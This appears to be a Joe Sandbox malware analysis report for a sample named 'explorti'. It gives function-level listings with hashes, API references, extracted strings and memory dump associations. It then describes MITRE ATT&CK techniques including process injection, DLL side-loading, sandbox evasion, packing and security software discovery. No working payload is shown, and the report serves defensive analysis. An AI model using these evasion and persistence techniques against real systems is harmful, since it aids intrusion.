Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
String ID: 'k,d+1$@y,$d+1
API String ID: 4078500453-3051532360
Opcode ID: e1c2f1620ab673f456f26699fd94b9efa840f8a217677dbd2f5d0d823fa27338
Instruction ID: 5ac3fc8582d32e542ab528683b375800bfd0472723981bdd8c90b3ec0db01c02
Opcode Fuzzy Hash: e1c2f1620ab673f456f26699fd94b9efa840f8a217677dbd2f5d0d823fa27338
Instruction Fuzzy Hash: 6931F3B19243059BD720DF64D846F56B7E8EF14310F00073EE545C3241E771EA64CBA1

Function 002E70C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 002E710B

Strings

.cmd, xrefs: 002E7129
.exe, xrefs: 002E7118
.bat, xrefs: 002E713A
.com, xrefs: 002E714B

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 00ea6f69934e88b4d4b73ef1ccbd5ade06917765642a64a06869687f5d9de8ff
Instruction ID: a0f1c3b04e74b5a07fdf06bbeff9341e8c002f0ee486b05a8ac16222fcfc3b16
Opcode Fuzzy Hash: 00ea6f69934e88b4d4b73ef1ccbd5ade06917765642a64a06869687f5d9de8ff
Instruction Fuzzy Hash: 81014E376F8397225619281BDC0267B57C89B82BB4B65002BFE48FF3C2DF44DC228690

Function 002B2670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 002B2806
___std_exception_destroy.LIBVCRUNTIME ref: 002B28A0

Strings

P#+, xrefs: 002B27BE, 002B2899
P#+, xrefs: 002B2811

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: P#+$P#+
API String ID: 2970364248-3630811068
Opcode ID: 70b2a9a9586c1e09a9de834652ffb17de91ee2705a43e96fe575469d42251518
Instruction ID: 8bf694f6cca2586009ac8037497c7382080c573fdf3ccfbfe4aab7d0ff27ce79
Opcode Fuzzy Hash: 70b2a9a9586c1e09a9de834652ffb17de91ee2705a43e96fe575469d42251518
Instruction Fuzzy Hash: F671A071E10248DFDB05CFA8C881BDDFBB5EF49310F54822DE805A7281EB74A994CBA5

Function 002B2AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 002B2B23

Strings

P#+, xrefs: 002B2B2E
P#+, xrefs: 002B2B18
This function cannot be called on a default constructed task, xrefs: 002B2B03

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#+$P#+$This function cannot be called on a default constructed task
API String ID: 2659868963-3747907092
Opcode ID: 5f4ae2c1d74c0765fbba671cdefa165682f7caef8a00d03882623cd15d2f7e41
Instruction ID: 69373df27dba9ba99849b4e6ffd78c72d307890bafe1a761b2a981b760b98585
Opcode Fuzzy Hash: 5f4ae2c1d74c0765fbba671cdefa165682f7caef8a00d03882623cd15d2f7e41
Instruction Fuzzy Hash: FEF0F67092030C9BC715DF689841ADEB7EDDF05300F5042AEF84897641EB70AA648B94

Function 002B2440 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 002B247E

Strings

P#+, xrefs: 002B2486
P#+, xrefs: 002B246D
'k,d+1, xrefs: 002B2440

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: 'k,d+1$P#+$P#+
API String ID: 2659868963-3687900473
Opcode ID: c96602b61fe2440ad73d7e6ef95555d1ff4944c27e44db1370079db165e3a0f0
Instruction ID: ffe50b62689af6755c7638275dc8d2133fd03a81382ae70d7e8d1c0b2cfb571a
Opcode Fuzzy Hash: c96602b61fe2440ad73d7e6ef95555d1ff4944c27e44db1370079db165e3a0f0
Instruction Fuzzy Hash: 0CF0E5B592030C67C718EBE4DC059CAB3ECDE1A300F408A25F644EB640FBB0FA948B91

Function 002EC9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 002ECA37

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction ID: 6f5c35f885ebf42d949694acdf36886cea26db1743e3c2a153cb1236e9fb5a26
Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction Fuzzy Hash: 60B168329602C69FDB11CFAAC851BBEBBE5EF55340F7441AAE845DB341D6348D12CB60

Function 002CBAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 002CBAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 002CBB14
_xtime_get.LIBCPMT ref: 002CBB37
__Xtime_diff_to_millis2.LIBCPMT ref: 002CBB43

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 774aedaede76e9a3711c1516632479cb22c6cb9e3aedf9ea3951256c4d324711
Instruction ID: 1403c77275e0a8be2548534b448241a80327373c44c9ab07b652ef69ae495b30
Opcode Fuzzy Hash: 774aedaede76e9a3711c1516632479cb22c6cb9e3aedf9ea3951256c4d324711
Instruction Fuzzy Hash: 1A214F71A111099FDF15EFA4CC82EAEBBB8EF09714F500169F905B7251DB30AD118FA1

Function 002C7040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 002C726C

Strings

`z,, xrefs: 002C7282
@.+, xrefs: 002C7250

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: @.+$`z,
API String ID: 3366076730-3529498242
Opcode ID: 7aeb4308d412788d3288bd43c2c105302890c40a022e29aca24b842a8b6421da
Instruction ID: 2cdfb0c5a06fc203b6d3b4d524be8e26d73098172148d7f655a49ab851a5742e
Opcode Fuzzy Hash: 7aeb4308d412788d3288bd43c2c105302890c40a022e29aca24b842a8b6421da
Instruction Fuzzy Hash: 5CA127B4E116158FDB21CFA8C984B9EBBF0AF48710F19825EE819AB351D7759D01CF81

Function 002EF21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 002EF263

Strings

`'1, xrefs: 002EF235
8"1, xrefs: 002EF30B

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"1$`'1
API String ID: 3903695350-1012482134
Opcode ID: 31c416f218f559d66bef1f2220ecfc719514b92820b48d593b52e35162ea9c7b
Instruction ID: 14d503f2d03ad89140ec086074907163d71cfb62f19fe93b995c51e9a2d33634
Opcode Fuzzy Hash: 31c416f218f559d66bef1f2220ecfc719514b92820b48d593b52e35162ea9c7b
Instruction Fuzzy Hash: 6A3192315A03869FEB61AF3ADA05B5673E8AF40310FA0486AE846D7151DF31FCA0CF11

Function 002B3930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 002B3962
__Mtx_init_in_situ.LIBCPMT ref: 002B39A1

Strings

pB+, xrefs: 002B3940

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: pB+
API String ID: 3366076730-3309528453
Opcode ID: 73a76cfd58af7cb7ae6e84e98ce241d170cfc95a0f943fc656787439d2da654f
Instruction ID: f79e2226fa2df873bcfd255b1178b7af74f1fc7e2c36321761df55eeff9a9656
Opcode Fuzzy Hash: 73a76cfd58af7cb7ae6e84e98ce241d170cfc95a0f943fc656787439d2da654f
Instruction Fuzzy Hash: 984125B0501B059FD720CF18C588B9ABBF0FF44355F24861DE86A8B341E7B4AA15CF80

Function 002B2520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 002B2552

Strings

P#+, xrefs: 002B2547
P#+, xrefs: 002B255D

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#+$P#+
API String ID: 2659868963-3630811068
Opcode ID: ed869ac024ba471c7f902c38efc6f85bd0ab96595190cac261cad3ffe9d4c1f5
Instruction ID: 6e62ff946a4b019f16bf32d81548c88337a5edcc98b54685f573a603c483f847
Opcode Fuzzy Hash: ed869ac024ba471c7f902c38efc6f85bd0ab96595190cac261cad3ffe9d4c1f5
Instruction Fuzzy Hash: ADF0E270D1120C9BC715DF68D840A8EBBF8AF4A300F1082AEE444A7240EA705A648B94

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

